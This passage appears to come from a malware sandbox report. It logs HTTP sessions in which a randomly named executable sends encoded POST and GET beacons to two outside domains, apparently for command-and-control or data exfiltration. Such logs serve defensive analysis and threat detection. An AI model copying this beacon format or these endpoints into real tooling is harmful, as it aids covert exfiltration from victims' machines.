                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Dec 17, 2024 18:39:08.495027065 CET388INHTTP/1.1 200 OK
                                                  content-type: text/html
                                                  date: Tue, 17 Dec 2024 17:39:08 GMT
                                                  content-length: 267
                                                  connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 44 75 70 47 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 53 45 6e 33 71 57 54 48 49 49 4d 41 55 64 4a 46 63 54 72 70 54 69 4e 2f 4a 51 65 4f 76 78 48 30 52 67 71 73 30 72 59 6f 77 37 65 74 53 32 37 69 57 38 3d 26 77 64 77 3d 6d 38 41 48 73 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs"}</script></head></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.6498803.33.130.190802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:24.257255077 CET795OUTPOST /fm31/ HTTP/1.1
                                                  Host: www.medicaresbasics.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.medicaresbasics.xyz
                                                  Referer: http://www.medicaresbasics.xyz/fm31/
                                                  Cache-Control: no-cache
                                                  Content-Length: 210
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 2f 65 38 6a 37 4c 41 5a 71 47 59 75 65 2f 2f 6d 50 58 71 48 71 38 48 75 4d 57 73 43 69 33 63 6f 51 33 41 4a 69 52 42 38 41 73 58
                                                  Data Ascii: RDupG=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX/e8j7LAZqGYue//mPXqHq8HuMWsCi3coQ3AJiRB8AsX
                                                  Dec 17, 2024 18:39:25.345381021 CET73INHTTP/1.1 405 Method Not Allowed
                                                  content-length: 0
                                                  connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.6498863.33.130.190802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:26.925138950 CET819OUTPOST /fm31/ HTTP/1.1
                                                  Host: www.medicaresbasics.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.medicaresbasics.xyz
                                                  Referer: http://www.medicaresbasics.xyz/fm31/
                                                  Cache-Control: no-cache
                                                  Content-Length: 234
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 31 38 6d 48 37 48 37 47 62 39 57 51 62 51 4b 50 6b 59 64 4e 58 4a 61 67 37 72 39 46 52 78 38 69 2f 36 6e 64 6c 6f 69 63 35 4b 42 34 48 77 36 48 52 77 70 73 7a 74 34 51 31 6d 42 75 5a 32 52 71 38 43 39 61 6b 77 6e 78 34 4d 7a 66 6d 57 6c 32 43 4e 72 4b 6f 30 46 6b 53 35 57 54 63 32 45 42 6f 50 70 39 58 67 51 33 34 30 4d 41 33 49 4f 4a 6b 62 69 76 78 53 59 63 62 6a 38 74 48 45 4d 74 66 37 72 6f 69 6c 36 38 58 4a 56 36 63 46 75 4f 4f 65 43 43 33 32 71 51 50 41 62 31 64 6d 7a 30 4a 30 71 6f 6a 6a 42 71 49 4b 5a 76 44 54 2f 4c 4c 2b 51 6f 52 77 47 77 3d 3d
                                                  Data Ascii: RDupG=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo18mH7H7Gb9WQbQKPkYdNXJag7r9FRx8i/6ndloic5KB4Hw6HRwpszt4Q1mBuZ2Rq8C9akwnx4MzfmWl2CNrKo0FkS5WTc2EBoPp9XgQ340MA3IOJkbivxSYcbj8tHEMtf7roil68XJV6cFuOOeCC32qQPAb1dmz0J0qojjBqIKZvDT/LL+QoRwGw==
                                                  Dec 17, 2024 18:39:28.013927937 CET73INHTTP/1.1 405 Method Not Allowed
                                                  content-length: 0
                                                  connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.6498953.33.130.190802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:29.574173927 CET1832OUTPOST /fm31/ HTTP/1.1
                                                  Host: www.medicaresbasics.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.medicaresbasics.xyz
                                                  Referer: http://www.medicaresbasics.xyz/fm31/
                                                  Cache-Control: no-cache
                                                  Content-Length: 1246
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 39 38 6c 30 44 48 70 31 44 39 58 51 62 51 4a 50 6b 5a 64 4e 57 56 61 67 6a 76 39 46 64 50 38 6b 37 36 31 76 74 6f 6b 6f 56 4b 55 49 48 77 79 6e 52 74 6d 4d 7a 43 34 51 6c 63 42 75 4a 32 52 71 38 43 39 63 41 77 33 54 63 4d 38 2f 6d 4a 69 32 43 4a 76 4b 70 68 46 6b 71 70 57 53 70 44 46 77 55 50 6f 65 76 67 63 6b 41 30 41 41 33 4b 50 4a 6c 47 69 76 38 4b 59 66 76 76 38 74 62 69 4d 71 76 37 70 4a 66 64 69 75 6a 64 47 4c 73 59 33 39 47 59 4e 33 7a 44 79 7a 72 47 64 6b 74 5a 7a 41 39 50 71 49 75 35 4b 4d 78 39 51 74 43 2f 38 2b 53 61 61 37 6f 46 57 71 6d 41 39 6f 6d 52 4e 57 44 47 66 34 4b 72 74 58 38 78 68 37 4f 39 72 59 54 51 31 63 39 51 68 43 30 67 63 74 5a 36 65 61 70 32 6d 62 63 48 71 4c 4d 6c 35 2f 71 56 2f 30 73 75 50 37 44 74 67 7a 35 4a 5a 72 70 74 69 30 34 2b 49 55 54 37 74 72 61 6c 41 62 56 79 68 2b 51 58 6d 30 65 72 71 56 65 4f 36 7a 6a 54 44 79 59 68 [TRUNCATED]
                                                  Data Ascii: RDupG=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo98l0DHp1D9XQbQJPkZdNWVagjv9FdP8k761vtokoVKUIHwynRtmMzC4QlcBuJ2Rq8C9cAw3TcM8/mJi2CJvKphFkqpWSpDFwUPoevgckA0AA3KPJlGiv8KYfvv8tbiMqv7pJfdiujdGLsY39GYN3zDyzrGdktZzA9PqIu5KMx9QtC/8+Saa7oFWqmA9omRNWDGf4KrtX8xh7O9rYTQ1c9QhC0gctZ6eap2mbcHqLMl5/qV/0suP7Dtgz5JZrpti04+IUT7tralAbVyh+QXm0erqVeO6zjTDyYhszfSg3GOGaLT2NqLR+pXTYVw6QGNzvciTJgWMiZySpOj5WYWTpjR3O9g3RBa+mGMTJvqEKVMYxbAZr75jO74WiJFAWqh/OGAbuPY4GHiBq/NKGUTaCjqUNryFvHm/8phRlnICBzIH/N/niwK4Fs3uMPgrucq7mXzLJAHbwwakBjRg0oOH01nHQX2u8q8OoOW1U66Vq7nCCOnB6GpmVLNljlQmkOGBk3v4IdNozZkFm+RjBMhnJPcVpqpOgIdtrWtcUPQzXb7dQ7HwI53PppPcgIXecVgwFchKd8P2yrB73x4QRXoral+aWMABTueVeEiVk4STa0KIm17by/JJ/D6f7e0uoLkk/IwEGV0xbBVgLzbNLN+lVut30/3hmSf+rUbxfl9457DbXe0XO91u0EY72//XYw5U3s1XcM9bYcS3lJ3Ng/iIYJp6zT4ugrOKFtnM5DbFwU0r7EN/7vDP1g+gkmoP6vZKcQvdKS0d4iptAHQ2v+ge0EYA9CFClBS+rpLk5/fe7andobdcmeRFys9vhqx9Lj9/fJhelYprGEJdX3qCbnVqeF+jml14Efny16OiQefcJACnSIdiIA9D4XgPRVPpeUjVifTjMP8zlOoH1u05VcyvXFzVVwJYmw0HhuvKeTg0KlCTyoRIxBrHDTOHYEmAxjmkWv6BB [TRUNCATED]
                                                  Dec 17, 2024 18:39:30.768387079 CET73INHTTP/1.1 405 Method Not Allowed
                                                  content-length: 0
                                                  connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.6499023.33.130.190802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:32.230590105 CET519OUTGET /fm31/?RDupG=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&wdw=m8AHs HTTP/1.1
                                                  Host: www.medicaresbasics.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Dec 17, 2024 18:39:34.351852894 CET388INHTTP/1.1 200 OK
                                                  content-type: text/html
                                                  date: Tue, 17 Dec 2024 17:39:34 GMT
                                                  content-length: 267
                                                  connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 44 75 70 47 3d 44 75 4c 75 2f 5a 4a 45 5a 30 76 73 61 37 4e 4d 57 36 59 31 6c 75 77 4d 73 54 70 55 6a 54 69 61 7a 78 69 4b 73 46 71 4d 6a 6f 63 4a 6d 55 2b 57 7a 30 6e 2b 53 46 44 77 4a 72 42 41 57 34 4c 7a 4a 57 4c 5a 30 30 67 67 74 52 33 46 6c 4e 39 47 75 70 70 47 64 6f 37 61 79 31 4a 77 74 4f 79 4a 36 78 4e 46 47 65 51 4e 56 66 4a 32 38 49 45 46 33 52 4d 58 70 2b 4f 66 70 45 72 4f 75 4d 46 68 64 43 36 37 52 33 67 3d 26 77 64 77 3d 6d 38 41 48 73 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RDupG=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&wdw=m8AHs"}</script></head></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.6499388.217.17.192802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:48.088808060 CET786OUTPOST /ir1u/ HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.meliorahomes.net
                                                  Referer: http://www.meliorahomes.net/ir1u/
                                                  Cache-Control: no-cache
                                                  Content-Length: 210
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 68 38 6d 32 31 4e 53 2b 51 35 7a 66 35 4c 68 66 57 78 66 6f 43 49 67 4d 79 31 41 55 62 53 4a 74 56 6f 4b 33 65 64 6f 6e 43 6d 46 6a 30 52 30 53 32 44 6f 4c 5a 71 55 4f 34 4a 76 59 78 68 55 37 33 4a 78 38 4c 63 2f 2f 37 74 47 53 62 6d 32 4f 4c 6b 47 49 50 50 70 61 71 49 4b 4f 42 34 48 62 4b 48 47 48 52 4f 6a 62 38 77 55 71 41 75 7a 63 6f 7a 66 68 2b 4d 43 41 4b 63 78 61 46 37 62 2b 73 56 43 6f 33 52 54 69 79 6c 78 33 59 69 6f 36 70 37 64 69 76 6e 56 74 77 34 6c 4f 58 4f 4f 71 46 75 57 66 6d 46 77 30 4a 79 4d 39 4c 44 57 2b 43 68 6e 38 5a 56 62 5a 52 55 64 2f 4d 30 6e 79
                                                  Data Ascii: RDupG=jai/NoPHoBCQh8m21NS+Q5zf5LhfWxfoCIgMy1AUbSJtVoK3edonCmFj0R0S2DoLZqUO4JvYxhU73Jx8Lc//7tGSbm2OLkGIPPpaqIKOB4HbKHGHROjb8wUqAuzcozfh+MCAKcxaF7b+sVCo3RTiylx3Yio6p7divnVtw4lOXOOqFuWfmFw0JyM9LDW+Chn8ZVbZRUd/M0ny
                                                  Dec 17, 2024 18:39:49.640261889 CET393INHTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:39:49 GMT
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                  Content-Length: 203
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.6499448.217.17.192802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:50.744942904 CET810OUTPOST /ir1u/ HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.meliorahomes.net
                                                  Referer: http://www.meliorahomes.net/ir1u/
                                                  Cache-Control: no-cache
                                                  Content-Length: 234
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 74 74 56 49 36 33 66 5a 38 6e 50 47 46 6a 2f 78 30 62 34 6a 6f 4d 5a 71 59 47 34 4a 6a 59 78 67 77 37 33 49 42 38 4b 72 6a 38 35 39 47 51 41 57 32 49 49 55 47 49 50 50 70 61 71 4d 62 72 42 38 72 62 4b 58 32 48 52 76 6a 59 31 51 56 59 49 4f 7a 63 73 7a 66 74 2b 4d 43 2b 4b 65 55 42 46 2f 72 2b 73 58 61 6f 77 44 33 68 34 6c 77 38 63 69 70 46 35 4a 45 2b 67 33 49 73 75 72 74 36 58 38 65 42 4a 34 4c 46 36 32 77 58 62 69 73 2f 4c 42 4f 4d 43 42 6e 57 62 56 6a 5a 44 44 52 59 44 41 43 52 64 51 69 57 31 55 79 6c 70 72 78 77 43 6a 59 67 54 63 50 76 4c 41 3d 3d
                                                  Data Ascii: RDupG=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgttVI63fZ8nPGFj/x0b4joMZqYG4JjYxgw73IB8Krj859GQAW2IIUGIPPpaqMbrB8rbKX2HRvjY1QVYIOzcszft+MC+KeUBF/r+sXaowD3h4lw8cipF5JE+g3Isurt6X8eBJ4LF62wXbis/LBOMCBnWbVjZDDRYDACRdQiW1UylprxwCjYgTcPvLA==
                                                  Dec 17, 2024 18:39:52.302967072 CET393INHTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:39:52 GMT
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                  Content-Length: 203
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.6499518.217.17.192802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:53.402185917 CET1823OUTPOST /ir1u/ HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.meliorahomes.net
                                                  Referer: http://www.meliorahomes.net/ir1u/
                                                  Cache-Control: no-cache
                                                  Content-Length: 1246
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 6c 74 56 37 79 33 66 2b 51 6e 4f 47 46 6a 6a 42 30 65 34 6a 6f 52 5a 70 6f 43 34 49 66 49 78 69 34 37 6d 62 4a 38 61 4f 58 38 77 39 47 51 49 32 32 4a 4c 6b 47 64 50 4f 46 65 71 49 2f 72 42 38 72 62 4b 55 2b 48 58 2b 6a 59 7a 51 55 71 41 75 7a 51 6f 7a 65 79 2b 4d 61 78 4b 65 41 52 47 4f 58 2b 73 33 4b 6f 31 78 76 68 2b 31 77 2b 62 69 70 64 35 4a 34 58 67 33 55 4b 75 6f 77 74 58 38 36 42 4c 64 61 2b 76 48 67 44 43 53 70 66 63 54 4b 49 4f 55 71 6f 45 6b 2f 31 4b 51 34 74 4e 41 47 37 59 57 53 32 2b 6e 44 46 70 64 5a 64 42 57 30 7a 66 50 43 46 66 44 77 36 45 70 57 47 6b 7a 39 44 61 7a 67 6e 46 75 74 50 7a 4b 69 66 46 74 63 33 6e 61 6a 2f 33 6a 62 75 2f 5a 33 47 36 6e 55 71 4c 56 31 69 39 59 4a 7a 45 70 37 39 6c 4b 35 6a 63 41 6f 70 2b 47 37 30 39 45 6b 31 4f 35 44 6b 4e 65 70 70 32 4d 74 31 66 6f 54 7a 41 50 54 68 59 66 70 62 4f 31 74 43 38 48 78 38 7a 70 34 2b [TRUNCATED]
                                                  Data Ascii: RDupG=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgltV7y3f+QnOGFjjB0e4joRZpoC4IfIxi47mbJ8aOX8w9GQI22JLkGdPOFeqI/rB8rbKU+HX+jYzQUqAuzQozey+MaxKeARGOX+s3Ko1xvh+1w+bipd5J4Xg3UKuowtX86BLda+vHgDCSpfcTKIOUqoEk/1KQ4tNAG7YWS2+nDFpdZdBW0zfPCFfDw6EpWGkz9DazgnFutPzKifFtc3naj/3jbu/Z3G6nUqLV1i9YJzEp79lK5jcAop+G709Ek1O5DkNepp2Mt1foTzAPThYfpbO1tC8Hx8zp4+PHui0WQ/TbgnnC6N0iJqAfCulxSiaL4GUXiLOqLkXT4cFwE1gMLmWizuHcK2JfPlsWS6sNnl3vadyNA7xc05dNrzKNgojCdrBADoM4m/2NQZ6zMUnaWGyfCShVMCqSNaeRgW4+d157bw/bqcLNjJtgPIQFQ/Et87VbQFUkyvaMB7bMu2KloZagi2yA7t25tPLmCkqCVFcw4mfPH4wbeCB0jWaFeWispV2p9CDf7reZJ7tHyqFVcBjzi1VRm65kbsVxpiyLoDbaX6jWYbo7dDquM7yXh1Bt7lYrO8IB6q3MQzb//St8LU6qmnhf8cLYdyij9jx4g6SkyEUbXMj3qvpkUmz6aFNhKjnlkB/QO8bKgGaGsgNvrZRcPRxvZF0GQSJsOGXAXL1BvwzIab/jRXVHFg7xjjubFNj7u+ofq80Og06wx87iu7jYzv1BtDTcJfmdRcke8JMBsstdofGzCz0N5jVAsZjtDxPDRocJ/0wQSYvY2iKWQNGyPif/ckHAXIAfOYvX1ECPeiCOjZg8ZjP0blU/iAquluqD9LKZ6Dy3P+KPAxgOvhu6ORVwe+psm1KYahc1FbgzTHb6zWGrc2Bj9XigNUtBVyEsYF1UDjuQ49an+2jcQ/TxGiyAa9HDq7fk5qfUriCkSE/Q8bh9eqazCVDx0sufDA1K [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.6499598.217.17.192802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:39:56.062727928 CET516OUTGET /ir1u/?RDupG=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX86+yEJ2aXOXj0apRFi4P0I8PrRUWlOvP3kyATHOLhpgDgxP6JOJQ=&wdw=m8AHs HTTP/1.1
                                                  Host: www.meliorahomes.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Dec 17, 2024 18:39:57.627840996 CET393INHTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:39:57 GMT
                                                  Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                  Content-Length: 203
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
